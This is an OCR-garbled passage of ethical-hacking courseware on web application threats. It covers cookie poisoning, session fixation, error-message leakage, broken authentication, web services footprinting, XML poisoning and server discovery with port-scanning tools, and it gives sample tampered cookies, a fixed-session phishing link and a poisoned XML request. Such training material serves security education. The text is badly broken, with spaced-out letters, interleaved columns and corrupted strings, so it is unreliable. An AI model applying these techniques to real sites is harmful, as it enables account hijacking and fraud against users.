A tta c k e r steals www.juggyshop.com Accept: •/• Referrer:
http://www.juggyshop.com/showprods.aspx Cookie:
cookie (Sniffing, SESSIONID*325896ASDD23SA3587; BasketSlze»3; lteml»1258;
XSS, phishin g attack) Item2=2658; Item3«6652; TotalPrice*100;
A tta c k e r orders fo r p ro d u c t using m od ifie d cookie
P roduct is d elivered t o attacke r's address
A tta c k e r
H o w C o o k ie P o is o n in g W o r k s
C o o k ie s are m a in ly used by w e b a p p li c a t i o n s t o s im u la te a s t a t e f u l e x p e r ie n c e
d e p e n d in g u p o n th e end u ser. T h e y a re used as an i d e n t i t y f o r t h e s e r v e r side o f w e b
a p p li c a t i o n c o m p o n e n t s . T his a t t a c k a lt e r s t h e v a lu e o f a c o o k ie a t t h e c l i e n t s id e p r i o r t o t h e
r e q u e s t t o t h e s e rv e r. A w e b s e r v e r can se n d a s e t c o o k ie w i t h t h e h e lp o f a n y r e s p o n s e o v e r
t h e p r o v id e d s tr in g a n d c o m m a n d . T h e c o o k ie s a re s t o r e d o n t h e u s e r c o m p u t e r s a n d a re a
s t a n d a r d w a y o f r e c o g n iz in g users. All t h e r e q u e s ts o f t h e c o o k ie s h a v e b e e n s e n t t o t h e w e b
s e rv e r o n c e it has b e e n set. To p r o v id e f u r t h e r f u n c t i o n a l i t y t o t h e a p p li c a t i o n , c o o k ie s can be
m o d i f i e d a n d a n a ly z e d b y Ja vaS cript.
w In t h is a tta c k , t h e a t t a c k e r s n iffs t h e u ser's c o o k ie s a n d t h e n m o d if ie s t h e c o o k ie

p a r a m e t e r s a n d s u b m it s t o t h e w e b s e rv e r. T h e s e r v e r t h e n a c c e p ts t h e a tta c k e r 's
r e q u e s t a n d p ro c e sse s it.

S e ssio n F ix atio n A ttack CEH
In a s e s s io n f ix a t io n a t ta c k , t h e
A t ta c k e r a s s u m e s t h e i d e n t i t y o f t h e
a t ta c k e r t r ic k s t h e u s e r t o acc e s s a
v ic t im a n d e x p lo it s h is c r e d e n t ia ls a t
g e n u in e w e b s e r v e r u s in g a n e x p lic it
th e s e rv e r
s e s s io n ID v a lu e
A tta c k e r logs o n to th e bank w e b s ite using his c re d e n tia ls
W eb s e rv e r sets a session ID o n th e a tta c k e r's m achine

S e rv e r
(jugg ybank.com )
A tta c k e r logs in to th e s e rv e r using th e v ic tim 's
A t ta c k e r
|1 g o
c re d e n tia ls w ith th e sam e session ID
A A
Attacker sends an
email containing a link
with a fix session ID h t t p : / / juggybank.dom/login. ja
p?sessionid=4321
User clicks o n th e lin k and is re d ire c te d t o th e bank w e b s ite •
U ser
It User logs in to th e s e rv e r using his c re d e n tia ls and fix e d session ID
S e s s io n F ix a tio n A tta c k s
Session f i x a t i o n h e lp s an a t t a c k e r t o h ija c k a v a lid u se r sessio n. In th is a tta c k , t h e

a t t a c k e r a u t h e n t i c a t e s h im o r h e r s e l f w i t h a k n o w n se s s io n ID a n d t h e n lu re s t h e v i c t i m t o use
t h e s a m e session ID. If t h e v i c t i m uses t h e se ssio n ID s e n t by t h e a t t a c k e r , t h e a t t a c k e r h ija cks
t h e u s e r v a l i d a t e d s e s s io n w i t h t h e k n o w l e d g e o f t h e used session ID.
T h e session f i x a t i o n a t t a c k p r o c e d u r e is e x p la in e d w i t h t h e h e lp o f t h e f o l l o w i n g d ia g r a m :
A tta c k e r logs on t o th e ban k w e b s ite using his c re d e n tia ls
W e b s e rv e r sets a session ID on th e a tta c k e r's m achin e

S e rv e r
(ju g g y b a n k .c o m )
Attacker
A tta c k e r logs in to th e s e rv e r using th e v ic tim 's
c re d e n tia ls w ith th e sam e session ID
B
DO
A tta cker sends an

em ail containing a link
w ith a fix session ID h ttp : //juggybank.dom /login. js
p?sessionid=4321
U ser clicks on t h e lin k and is re d ire c te d t o th e ban k w e b s ite
U ser logs in to th e s e rv e r using his c re d e n tia ls and fixe d session ID
User
FIGURE 1 3 .2 6 : H ow C o o k ie P o iso n in g W o rk s

I n s u f f i c i e n t T r a n s p o r t L a y e r
CEH
P r o t e c t io n
I n s u ff ic ie n t t r a n s p o r t la y e r p r o t e c tio n s u p p o r t s w e a k a lg o r ith m s , a n d
u s e s e x p ir e d o r in v a lid c e r t if ic a t e s
U n d e r p riv ile g e d SSL s e tu p c a n a ls o h e lp t h e

a tta c k e r t o la u n c h p h is h in g a n d M IT M a tta c k s
T h is v u ln e r a b ilit y e x p o s e s u s e r 's d a ta
t o u n t r u s t e d t h i r d p a r t ie s a n d c a n
le a d t o a c c o u n t t h e f t
Cop yrig ht © by E&C01nal. A ll Rights Reserved. R eproduction is S trictly Prohibited
In s u f fic ie n t T r a n s p o r t L a y e r P r o te c tio n
SSL/TLS a u t h e n t i c a t i o n s h o u ld be used f o r a u t h e n t i c a t i o n o n t h e w e b s i t e s o r t h e
a t t a c k e r can m o n i t o r n e t w o r k t r a f f i c t o s te a l an a u t h e n t i c a t e d u s e r's se ssio n c o o k ie .
I n s u f f i c ie n t t r a n s p o r t la y e r p r o t e c t i o n m a y a l l o w u n t r u s t e d t h i r d p a r t i e s t o o b t a i n u n a u t h o r i z e d
access t o s e n s itiv e i n f o r m a t i o n . T h e c o m m u n i c a t i o n b e t w e e n t h e w e b s i t e a n d t h e c l i e n t s h o u ld
be p r o p e r l y e n c r y p t e d o r d a ta can be i n t e r c e p t e d , i n je c te d , o r r e d ir e c t e d . V a r io u s t h r e a t s like
a c c o u n t t h e f t s , p h is h in g a tta c k s , a n d a d m in a c c o u n ts m a y h a p p e n a f t e r s y s te m s a re b e in g
c o m p ro m is e d .

Im proper Error Handling CEH
J I m p r o p e r e r r o r h a n d l i n g g iv e s i n s i g h t i n t o s o u r c e c o d e s u c h a s lo g ic f l a w s ,
d e f a u lt a c c o u n ts , e tc .
U s in g t h e in f o r m a t i o n r e c e iv e d f r o m a n e r r o r m e s s a g e , a n a t t a c k e r
id e n t if ie s v u ln e r a b ilit ie s
In fo r m a tio n G a th e re d
httpy/j uggyboy.com/
lo o
e O u t o f m e m o ry
B o y .1
« N u ll p o in t e r e x c e p tio n s
G eneral Error
« S y s te m c a ll fa ilu re
Couldnotobtainpost/userInformation
® D a ta b a s e u n a v a ila b le DEBUGMODE
SQLErroc: 1016Can'topenfile:'nuke_bbposts_text.MYO'. (errno: 145)
© N e tw o r k t im e o u t SELECTu.username, u.userjd, u.user_posts, u.user_from,u.user_webs!te.
u.user_email, u.user_msnm,u.user_viewemail, u.user_rank, u.user_sig,
S D a ta b a s e in fo r m a tio n
u.user_sig_bbcode_uid, u.user_alowsmile, p.*, pt.post_text, ptpost_subject
pt.bbcode.uidFROMnuke_bbpostsp, nuke_usersu, nuke_bbposts_text ptWHERE
p.topicJd»1547‫ '׳‬ANDpt.postJd■p.postJdANDu.userjd=p.posterjdORDERBY
a W e b a p p lic a tio n lo g ic a l f lo w p.post.tlmeASCLIMIT0, IS
Line:43S
© A p p lic a tio n e n v ir o n m e n t File:/user/home/geeks/www/vonage/modules/Forums/viewtope.php
Copyright © by E&Cauacfl. All Rights Reserved. Reproduction is Strictly Prohibited.
JJw Si Im p r o p e r E r r o r H a n d lin g
el I m p r o p e r e r r o r h a n d lin g m a y r e s u lt in v a r io u s t y p e s o f issues f o r a w e b s i t e e x c lu s iv e ly
r e la t e d t o s e c u r it y a s p e cts, e s p e c ia lly w h e n in t e r n a l e r r o r m e ssa g e s such as s ta c k tra c e s ,
d a ta b a s e d u m p s , a n d e r r o r c o d e s a re d is p la y e d t o t h e a tta c k e r . A n a t t a c k e r can g e t v a r io u s
d e ta ils r e la t e d t o t h e n e t w o r k v e r s io n , e tc. I m p r o p e r e r r o r h a n d l i n g g ive s in s ig h t i n t o s o u rc e
c o d e such as lo g ic fla w s , d e f a u l t a c c o u n ts , e tc. U sing t h e i n f o r m a t i o n r e c e iv e d f r o m an e r r o r
m ess a g e , an a t t a c k e r i d e n t i f i e s v u l n e r a b i l i t i e s f o r la u n c h in g a tta c k s .
I m p r o p e r e r r o r h a n d lin g m a y a l l o w an a t t a c k e r t o g a t h e r i n f o r m a t i o n such as:
© O ut of m em ory
e N ull p o i n t e r e x c e p tio n s
e S y s te m call fa i lu r e
e D a ta b a s e u n a v a ila b le
0 N e tw o rk tim e o u t
Q D a ta b a s e i n f o r m a t i o n
e W e b a p p li c a t i o n lo g ica l f l o w
e A p p lic a tio n e n v iro n m e n t

I n s e c u r e C r y p t o g r a p h i c S t o r a g e C E H
Cop yrig ht © by E&C01nal. A ll Rights Reserved. R eproduction is S trictly Prohibited.
!. j! In s e c u re C r y p to g r a p h ic S to ra g e
Web a p p li c a t i o n s use c r y p t o g r a p h ic a lg o r i t h m s t o e n c r y p t t h e i r d a ta and o th e r

s e n s itiv e i n f o r m a t i o n t h a t is t r a n s f e r r e d f r o m s e r v e r t o c l i e n t o r v ic e ve rsa . T h e w e b a p p li c a t i o n
uses c r y p t o g r a p h ic c o d e t o e n c r y p t t h e d a ta . In s e c u re c r y p t o g r a p h ic s to ra g e r e fe r s t o w h e n an
a p p li c a t i o n uses p o o r l y w r i t t e n e n c r y p t i o n c o d e t o s e c u r e ly e n c r y p t a nd s to r e s e n s itiv e d a ta in
t h e d a ta b a s e .
T h e in s e c u r e c r y p t o g r a p h ic s to r a g e m e n t i o n s t h e s ta te o f an a p p li c a t i o n w h e r e p o o r e n c r y p t i o n
c o d e is u sed f o r s e c u r e ly s t o r i n g d a ta in t h e d a ta b a s e . So t h e in s e c u r e d a ta can be e a sily h a c k e d
a n d m o d i f i e d by t h e a t t a c k e r t o g ain c o n f i d e n t i a l a n d s e n s i t i v e i n f o r m a t i o n such as c r e d i t ca rd
in fo rm a tio n , passw ords, SSNs, and o th e r a u th e n tic a tio n c re d e n tia ls w ith a p p ro p ria te
e n c r y p t i o n o r h a s h in g t o la u n c h i d e n t i t y t h e f t , c r e d i t c a rd f r a u d , o r o t h e r c rim e s . D e v e lo p e r s
can a v o id such a tta c k s b y u sin g p r o p e r a lg o r i t h m s t o e n c r y p t t h e s e n s itiv e d a ta .
T h e f o l l o w i n g p ic t o r ia l r e p r e s e n t a t i o n s h o w s t h e v u ln e r a b l e c o d e t h a t is p o o r l y e n c r y p t e d a nd
s e c u re c o d e t h a t is p r o p e r l y e n c r y p t e d u s in g a s e c u re c r y p t o g r a p h i c a l g o r i t h m .

B r o k e n A u t h e n t ic a t io n a n d
CEH
S e s s io n M a n a g e m e n t
B A n a t t a c k e r u s e s v u l n e r a b i l i t i e s in t h e a u t h e n t i c a t i o n o r s e s s io n m a n a g e m e n t f u n c t i o n s s u c h
a s e x p o s e d a c c o u n t s , s e s s io n ID s , lo g o u t , p a s s w o r d m a n a g e m e n t , t i m e o u t s , r e m e m b e r m e ,
s e c r e t q u e s t i o n , a c c o u n t u p d a t e , a n d o t h e r s t o im p e r s o n a t e u s e r s
Session ID in URLs Password Exploitation Timeout Exploitation

http://juggyshop.com/sa le/saleitems=30
4;jsessionid120‫ ־‬MTOIDPXMOOQSABGCK A tta c k e r gains access t o th e w e b If an app lica tio n 's tim e o u ts are n o t set
LHCJUN2JV?dest‫ ־‬NewMexico a p p lic a tio n 's passw ord database. p ro p e rly and a user s im p ly closes th e
I f user passw ords are n o t b ro w s e r w ith o u t logging o u t fro m sites
A tta c k e r s niffs th e n e tw o rk tra ffic
e n c ry p te d , th e a tta c k e r can accessed th ro u g h a p u b lic c o m p u te r,
o r tric k s th e user t o g e t th e
e x p lo it e v e ry u sers' p assw ord th e a tta c k e r can use th e sam e b ro w s e r
session IDs, and reuses th e
la te r and e x p lo it th e user's privilege s
session IDs fo r m alicious purposes
Cop yrig ht © by E&Coinal. A ll Rights Reserved. R eproduction is S trictly Prohibited.
B r o k e n A u th e n tic a tio n a n d S e s s io n M a n a g e m e n t
A u t h e n t i c a t i o n a n d session m a n a g e m e n t in c lu d e s e v e r y a s p e c t o f u s e r a u t h e n t i c a t i o n
a n d m a n a g in g a c tiv e sessions. Y e t t i m e s s o lid a u t h e n t i c a t i o n s also fa il d u e t o w e a k c r e d e n t i a l
f u n c t i o n s like p a s s w o r d c h a n g e , f o r g o t m y p a s s w o r d , r e m e m b e r m y p a s s w o r d , a c c o u n t u p d a te ,
e tc. U t m o s t c a re has t o be ta k e n r e la t e d t o u s e r a u t h e n t i c a t i o n . It is a lw a y s b e t t e r t o use s t r o n g
a u t h e n t i c a t i o n m e t h o d s t h r o u g h sp ecial s o f t w a r e - a n d h a r d w a r e - b a s e d c r y p t o g r a p h ic t o k e n s
o r b io m e t r i c s . A n a t t a c k e r uses v u ln e r a b i l it ie s in t h e a u t h e n t i c a t i o n o r se ssio n m a n a g e m e n t
f u n c t i o n s such as e x p o s e d a c c o u n ts , session IDs, lo g o u t, p a s s w o r d m a n a g e m e n t , t i m e o u t s ,
r e m e m b e r m e , s e c r e t q u e s t i o n , a c c o u n t u p d a t e , a nd o t h e r s t o i m p e r s o n a t e users.
S e s s io n I D in U R L s
1 , A n a t t a c k e r s n iffs t h e n e t w o r k t r a f f i c o r t r ic k s t h e u s e r t o g e t t h e session IDs, a nd

re u se s t h e session IDs f o r m a lic io u s p u r p o s e s .
E x a m p le :
h t t p : / / i u g g v s h o p . c o m /s a le /s a le ite m s = 3 0 4 ;is e s s io n id = 1 2 0 M T O ID P X M O O Q S A B G C K L H C J U N 2 J V ? d
e s t= N e w M e x ic o

Web Services Architecture CEH

C«rt1fW
4 itfciul NmIm
XML, SOAP, WSDL, Schema, WS-Advertising, etc.
.N e t TCP Channel,
Fast InfoS et, etc.
Cop yrig ht © by E&Coinal.A ll Rights Reserved. R eproduction is S trictly Prohibited.
W e b S e r v ic e s A r c h ite c tu r e
* T O
WS‫־‬W o rk Processes
WS‫־‬S ecu rity
W S-Federation W S-SecureConversion
WS‫־‬Policy
WS W S-Trust
Security
SAML Kerberos X.509
XML E ncryption
Policy
Security Token Profiles :1
XML D igital Signatures
XML, SOAP, WSDL, Schema, W S -A dvertising, etc.
j .Net TCP Channel,

HTTP Fast InfoSet, etc.
FIGURE 1 3 .2 9 : W e b S erv ices A r c h ite c tu re

Web Services Attack C EH

UrlifM IUmjI NMhM
0 Web services evolution and its increasing use in business offers new attack vectors in an application 0
framework
Web services are based on XML protocols such as Web Services Definition Language (WSDL) for describing
the connection points; Universal Description, Discovery, and Integration (UDDI) forthe description and
discovery of web services; and Simple Object Access Protocol (SOAP) for communication between web
^ 4 ^ 1‫־‬ ^ e b S e r v ic e s A tta c k
W e b se rv ice s e v o l u t i o n a n d its in c r e a s in g use in b u s in e ss o f f e r s n e w a t t a c k v e c t o r s in

an a p p li c a t i o n f r a m e w o r k . W e b se rv ic e s a re p ro c e s s - to - p r o c e s s c o m m u n i c a t i o n s t h a t h ave
sp e cia l s e c u r it y issues a n d n e e d s . W e b se rv ic e s a re based o n X M L p r o t o c o l s such as W e b
Services D e f in i t i o n Language (WSDL) fo r d e s c r ib in g th e c o n n e c tio n p o in t s ; U n iv e rs a l
D e s c r ip tio n , D is c o v e ry , and In te g ra tio n (U D D I) f o r t h e d e s c r ip t i o n and d is c o v e r y o f w e b
se rvice s ; a n d S im p le O b j e c t Access P r o to c o l (SOAP) f o r c o m m u n i c a t i o n b e t w e e n w e b se rvic es
t h a t a re v u ln e r a b l e t o v a r io u s w e b a p p li c a t i o n t h r e a t s . S im ila r t o t h e w a y a u s e r i n t e r a c t s w i t h a
w e b a p p li c a t i o n t h r o u g h a b r o w s e r , a w e b se rv ic e can i n t e r a c t d ir e c t ly w i t h t h e w e b a p p li c a t i o n
w i t h o u t t h e n e e d f o r an i n t e r a c t i v e u s e r session o r a b r o w s e r .
These web se rv ic e s h a ve d e t a i le d d e fin itio n s th a t a llo w r e g u la r u sers and a t ta c k e r s t o

u n d e r s t a n d t h e c o n s t r u c t i o n o f t h e s e rvice . In t h i s w a y , m u c h o f t h e i n f o r m a t i o n r e q u i r e d t o
f i n g e r p r i n t t h e e n v i r o n m e n t a n d f o r m u l a t e an a t t a c k is p r o v id e d t o t h e a t ta c k e r . It is e s t i m a t e d
t h a t w e b se rvice s r e i n t r o d u c e 7 0% o f t h e v u ln e r a b i l it ie s o n t h e w e b . S o m e e x a m p le s o f th is
t y p e o f a t t a c k are:
Q A n a t t a c k e r in je c ts a m a lic io u s s c r ip t i n t o a w e b s e rvice , a n d is a b le t o d isclo se a nd

m o d i f y a p p li c a t i o n d a ta .
© A n a t t a c k e r is u s in g a w e b se rv ic e f o r o r d e r i n g p r o d u c t s , a n d in je c ts a s c r ip t t o re s e t
q u a n t i t y a n d s ta tu s o n t h e c o n f i r m a t i o n p ag e t o less t h a n w h a t w a s o r i g i n a l l y o r d e r e d .

W e b S e r v ic e s F o o t p r in t in g A t t a c k C E H
C«rt1fW
4 itfciul NmIm
J A tta c k e r s f o o t p r i n t a w e b a p p lic a t io n t o g e t U D D I i n f o r m a t i o n s u c h a s b u s in e s s E n tity ,

b u s in e s S e r v ic e , b in d in g T e m p la te , a n d t M o d e l
X M L Q u e ry X M L R e s p o n s e
POST /inquire HTTP/1.1 HTTP 200 1.1‫ ־‬OK

Content •Type: text/xml; charset=utf-8 Date: Tue. 28 Sep 2004 10:07:42 GMT
Server: Mk*osoft-llS6.0‫׳‬
SOAPAction: —
X-Powered-By: ASP.NET
Cache-Control: no-cache XAspNet-Vers-oo 1 1 4322
Pragma: no-cache Cache-CortroJ: private, max-age=0
User-Agent: Java/1.4.2_04 Contort •Type: text/xml: cbarsot-utf 8
Host: uddi.miaosoft.com Contert •Length: 1272
Accept: text/html,image/gif, image/jpeg/; q=.2, /; q=.2
<?xml versk)n=*l.0‫ ־‬encoding=‫‘־‬utl-8,'?><80ap:Env0l0p0
Connection: keep-alive xmlnssoap-'bttp ‫׳‬/schemas xmlsoap org/soap/onvolopor xmlns:xsi-^ttp://www.w3.org/2001 ‫׳׳‬XMLSchoma
Content-Length:229 instance' xm1n8:xsd‫* ־‬hnp:/‫׳‬/www.w3.org/2001/XMLSchema,'><8oap:Body><8erv1ceList generic-^.O"
operator-*Microsoft Corporation‫ •־‬truncated-"false" xmlns-‫־‬,urn:uddi-org:apl_v2‫<>״‬servicelnfos><servicelnfo
se‫׳‬viceKey=*6ec464eO-218d-4dafb4dd‘>dd4ba9dc8l3’' businessKey=*9l4374tbM01-4834-b8ef-
<?xml version1.0 "‫ "־‬encoding‫" ־‬UTF-8" ?>
c9c34c8a0ce5*><namo xml lang-*on-us"> <>namo></sorvicolnk»<sorvicolnlo
<Envelop sorvcoKoy-M 1213238• 1b33 4014 8756 c89cc31250CC■• businossKoy-"bfb9dc23adoc-4173bd5f•
xmlns="http://scemas.xmlsoap.org/soap/envelop/"> 5545abacaalb"xnamc xml:lang-"en-us"> </namc></scrviceln10xscfvicelnlo
<Body> serv!ceKey«‫״‬ba6d9d56-ea3M263-a95a-eebl 7e59l Odb" businessKey="18b71de2-dl 5c-437c-8877-
<fmd_business generic="2.0" maxRows"50" cbec82l6d0f5’ xn a m e xml:lang=*en"> </namcx/servicelnloxservicelnlo
serviceKey»‫״‬bc82a008-5e4e4‫־‬cOc-8dba-c5e4e268le12" busines8Key»18785586-295‫״‬e-448a-b759-
xmlns="urn"uddi-
Cbb44a049t21”x n a m e xml:lang="on*> <-‫׳‬namo></scrvicclnfo><scfvicclnfo
org:api_v2"xname>amazon</name></find_business> serviceKey-,8faa80ea-42dd4‫־‬cOd*8070999‫־‬ce0455930" businessKey-"ee41518b-bf99-4a66-9e9e-
</Body> c33c4c43db5a*xname
</Envelop> 1
xH l:lang«*en'> </name></serviceln10><7serviceln10s></serviceList><;soap:Body><.'soap:
HTTP/1.1 50 Continue
^ W e b S e r v ic e s F o o tp r in tin g A tta c k
^ ^ A t t a c k e r s use U n iv e rs a l Business R e g is try (UBR) as m a j o r s o u r c e t o g a t h e r i n f o r m a t i o n

o f w e b servic es. It is v e r y u s e fu l f o r b o t h b u sin e s s e s a n d in d iv id u a ls . It is a p u b li c r e g i s t r y t h a t
runs on UDDI s p e c ific a t io n s and SOAP. It is s o m e w h a t s im ila r to a "W h o is se rve r" in
f u n c t i o n a l i t y . T o r e g is t e r w e b s e rv ice s o n UDDI s e rv e r, b u s in e s s o r o r g a n iz a t io n s u s u a lly use o n e
o f t h e f o l l o w i n g s tr u c t u r e s :
Q Business E n tity
Q Business S ervice
© B in d in g T e m p le
e T e c h n ic a l M o d e l ( t m o d e l )
H e n ce , a tta c k e r s f o o t p r i n t a w e b a p p li c a t i o n t o g e t UDDI i n f o r m a t i o n su ch as b u s in e s s E n tity ,

b u s in e s S e rv ic e , b in d i n g T e m p l a t e , a n d t M o d e l .

W e b S e r v ic e s X M L P o is o n in g CEH
Attackers insert malicious XML codes in SOAP requests to perform XML node manipulation or XML schema
poisoning in order to generate errors in XML parsing logic and break execution logic
Attackers can manipulate XML external entity references that can lead to arbitrary file or TCP connection
openings and can be exploited for other web service attacks
XML poisoning enables attackers to cause a denial-of-service attack and compromise confidential information
XM L R equest P o is o n e d X M L R e q u e s t
<CustomerRecord>
<CustomerRecord>
<C ustom erN um ber>2010</C ustom erN um ber>
<C ustom erN um ber>2010</C ustom erN um ber>
<FirstNam e>Jason</FirstNam e><Custom erNum ber>
<FirstName>Jason</FirstName>
2010</C ustom erN um ber>
<LastN am e>Springfield</LastN am e>
<FirstName>Jason</FirstNam e>
<Address>Apt 20, 3rd S treet</A ddress>
<LastN am e>Springfield</LastN am e>
jason@ springfield.com 
<Address>Apt 20, 3rd Street</A ddress>
6325896325
<Email>jason (®springfield.com </E m ail>
</Custom erRecord>
6325896325
</Custom erRecord>
W e b S e r v ic e s X M L P o is o n in g
X M L p o is o n in g is s im ila r t o a SQL i n j e c t i o n a tta c k . It has a la r g e r success r a te in a w e b

s e rv ic e s f r a m e w o r k . As w e b se rv ic e s a re i n v o k e d u s in g X M L d o c u m e n t s , t h e t r a f f i c t h a t g oe s
b e t w e e n s e r v e r a n d b r o w s e r a p p li c a t i o n s can be p o is o n e d . A t t a c k e r s c r e a t e m a lic io u s X M L
d o c u m e n t s t o a l t e r p a rs in g m e c h a n is m s like SAX a n d D O M t h a t a re used o n t h e s e rv e r.
A t t a c k e r s i n s e r t m a lic io u s X M L c o d e s in SOAP r e q u e s ts t o p e r f o r m X M L n o d e m a n i p u l a t i o n o r
X M L s c h e m a p o is o n in g in o r d e r t o g e n e r a t e e r r o r s in X M L p a rs in g log ic a nd b r e a k e x e c u t io n
logic. A t t a c k e r s can m a n i p u l a t e X M L e x t e r n a l e n t i t y r e f e r e n c e s t h a t can lead t o a r b i t r a r y file o r
TCP c o n n e c t i o n o p e n in g s a n d can be e x p l o i t e d f o r o t h e r w e b se rv ic e a tta c k s . X M L p o is o n in g
e n a b le s a t ta c k e r s t o ca use a d e n ia l- o f- s e r v ic e a t t a c k a n d c o m p r o m i s e c o n f i d e n t i a l i n f o r m a t i o n .

H a c k in g M e t h o d o l o g y
m m
W e b A p p l i c a t i o n H a c k in g T oo ls
So fa r, w e h a v e d iscu ss e d w e b a p p li c a t i o n c o m p o n e n t s a n d v a r io u s t h r e a t s a s s o c ia te d
w i t h w e b a p p lic a tio n s . N o w w e w i ll discuss w e b a p p li c a t i o n h a c k in g m e t h o d o l o g y . A h a c k in g
m e t h o d o l o g y is a w a y t o c h e c k e v e r y p o s s ib le w a y t o c o m p r o m i s e t h e w e b a p p li c a t i o n by
a t t e m p t i n g t o e x p l o i t all p o t e n t i a l v u l n e r a b i l it ie s p r e s e n t in it.
^ W e b A p p Pen T e s t in g W e b A p p C o n c e p ts
S e c u r i t y T o o ls W e b A p p T h re a ts
C ou nterm e asu res ^ H a c k in g M e t h o d o l o g y

1S1
W e b A p p l i c a t i o n H a c k in g T o o ls
T his s e c tio n g ive s a d e t a i le d e x p l a n a t io n o f w e b a p p li c a t i o n h a c k in g m e t h o d o l o g y .

# n ^ W e b A p p H a c k in g M e th o d o lo g y
‫< ס‬n >
In o r d e r t o h a c k a w e b a p p li c a t i o n , t h e a t t a c k e r in i t i a ll y tr i e s t o g a t h e r as m u c h
i n f o r m a t i o n as p o s s ib le a b o u t t h e w e b i n f r a s t r u c t u r e . F o o t p r i n t i n g is o n e m e t h o d u sin g w h i c h
an a t t a c k e r can g a t h e r v a lu a b le i n f o r m a t i o n a b o u t t h e w e b i n f r a s t r u c t u r e o r w e b a p p li c a t i o n .

Footprint Web Infrastructure CEH
J W e b i n f r a s t r u c t u r e f o o t p r i n t i n g i s t h e f i r s t s t e p in w e b a p p l i c a t i o n h a c k i n g ; i t h e l p s a t t a c k e r s t o
s e le c t v ic t im s a n d id e n t if y v u ln e r a b le w e b a p p lic a t io n s
Hidden
Content Discovery
Server Discovery E x tr a c t c o n t e n t a n d
f u n c t i o n a l it y t h a t is n o t
D is c o v e r t h e p h y s ic a l
d i r e c t ly lin k e d o r r e a c h a b le
s e r v e r s t h a t h o s ts
f r o m t h e m a in v is ib le c o n t e n t
w e b a p p lic a tio n Server Identification
G ra b s e r v e r b a n n e r s t o
id e n t if y t h e m a k e a n d
Service Discovery v e r s io n o f t h e w e b
s e rv e r s o ftw a re
D is c o v e r t h e s e r v ic e s r u n n in g o n w e b
s e r v e r s t h a t c a n b e e x p lo it e d as
a t ta c k p a th s f o r w e b a p p h a c k in g
F o o tp r in t W e b In fr a s tr u c tu r e
W e b i n f r a s t r u c t u r e f o o t p r i n t i n g is t h e f i r s t s te p in w e b a p p li c a t i o n h a c k in g ; it h e lp s
a t ta c k e r s to s e le c t v ic tim s and id e n tify v u ln e ra b le web a p p lic a tio n s . Through web
i n f r a s t r u c t u r e f o o t p r i n t i n g , an a t t a c k e r can p e r f o r m :
S e rv e r D is c o v e ry
‫י‬
In s e r v e r d is c o v e r y , w h e n t h e r e is an a t t e m p t i n g t o c o n n e c t t o a s e rv e r, t h e r e d i r e c t o r
m a k e s an i n c o r r e c t a s s u m p t i o n t h a t t h e r o o t o f t h e URL n a m e s p a c e w i ll be W e b D A V -
a w a r e . It d is c o v e r s t h e p h ysica l s e rv e rs t h a t h o s t w e b a p p lic a t io n .
S e r v ic e D is c o v e r y
D isc o ve rs t h e se rvice s r u n n i n g o n w e b s e rv e rs t h a t can be e x p l o i t e d as a t t a c k p a th s

f o r w e b a p p h a c k in g . T h e se rv ic e d is c o v e r y s e a rc h e s a t a r g e t e d a p p l i c a t i o n e n v i r o n m e n t f o r
lo a d s a n d se rv ic e s a u t o m a t i c a ll y .
S e rv e r Id e n tific a tio n
G ra b t h e s e r v e r b a n n e r s t o i d e n t i f y t h e m a k e a n d v e r s io n o f t h e w e b s e r v e r s o f t w a r e .
It c o n s is ts o f:
Q Local I d e n t i t y : T his s p e c ifie s t h e s e r v e r O r ig in - R e a lm a n d O r ig in - H o s t.

F o o t p r in t W e b I n f r a s t r u c t u r e :
S e r v e r D is c o v e r y
■ S e r v e r d is c o v e r y g iv e s in f o r m a t i o n a b o u t t h e l o c a t i o n o f s e r v e r s a n d e n s u r e s t h a t t h e t a r g e t
s e r v e r is a l i v e o n I n t e r n e t
W h o is lo o k u p u tility gives in fo r m a tio n a b o u t th e IP a d d re s s o f w e b s e rv e r and

DNS n a m e s
W h o is L o o k u p T ools:
e h ttp ://w w w .ta m o s .c o m e h ttp ://w w w .w h o is .n e t

s h ttp ://n e tc ra ft.c o m G h ttp ://w w w .d n s s tu ff.c o m
DNS In te r r o g a tio n p ro v id e s in fo r m a tio n a b o u t th e lo c a tio n a n d ty p e o f s e rv e rs
DNS In te r r o g a tio n Too ls:
9 h ttp ://w w w .d n s s tu ff.c o m 8 h ttp ://e -d n s .o rg

« h ttp ://n e tw o rk -to o ls .c o m » h ttp ://w w w .d o m a in to o ls .c o m
P ort Scanning a tte m p ts t o conn ect t o a p a rtic u la r set o f TCP o r UDP p o rts t o fin d o u t
th e service th a t exists on th e s e rv e r
P o rt Scanning Tools:
9 N m ap 0 W hatsU p P ortScannerTool
1 8 NetScan Tools Pro 6 Hping
Cop yrig ht © by E&C01nal. A ll Rights Reserved. R eproduction is S trictly Prohibited
F o o tp r in t W e b In fr a s tr u c tu r e : S e rv e r D is c o v e r y
In o r d e r t o f o o t p r i n t a w e b i n f r a s t r u c t u r e , f i r s t y o u n e e d t o d is c o v e r t h e a c t iv e s e r v e r s
o n t h e i n t e r n e t . S e r v e r d is c o v e r y g ive s i n f o r m a t i o n a b o u t t h e lo c a t i o n o f a c tiv e s e rv e rs o n t h e
I n t e r n e t . T h e t h r e e te c h n i q u e s , n a m e l y w h o i s l o o k u p , DNS i n t e r r o g a t i o n , a n d p o r t s c a n n in g ,
h e lp in d is c o v e r in g t h e a c tiv e s e rv e rs a n d t h e i r a s s o c ia te d i n f o r m a t i o n .
W h o is L o o k u p
f 3):
W h o is L o o k u p is a t o o l t h a t a llo w s y o u t o g a t h e r i n f o r m a t i o n a b o u t a d o m a i n w i t h th e
h e lp o f DNS a n d W H O IS q u e r ie s . T his p r o d u c e s t h e r e s u lt in t h e f o r m o f a H T M L
r e p o r t . It is a u t i l i t y t h a t gives i n f o r m a t i o n a b o u t t h e IP a d d re s s o f t h e w e b s e r v e r a n d DNS
n a m e s . S o m e o f t h e W h o is L o o k u p T o o ls are:
e h ttp ://w w w .ta m o s .c o m
e h ttp ://n e tc ra ft.c o m
e h ttp ://w w w .w h o is .n e t
0 h ttp ://w w w .d n s s tu ff.c o m
D N S In te r r o g a tio n
o DNS i n t e r r o g a t i o n is a d i s t r i b u t e d d a ta b a s e t h a t is used by v a r ie d o r g a n i z a t i o n s t o

F o o t p r in t W e b I n f r a s t r u c t u r e :
S e r v ic e D is c o v e r y
Copyright © by HrCounctl. A ll Rights Reserved. R eproduction is S trictly Prohibited.
F o o tp r in t W e b In fr a s tr u c tu r e : S e r v ic e D is c o v e r y
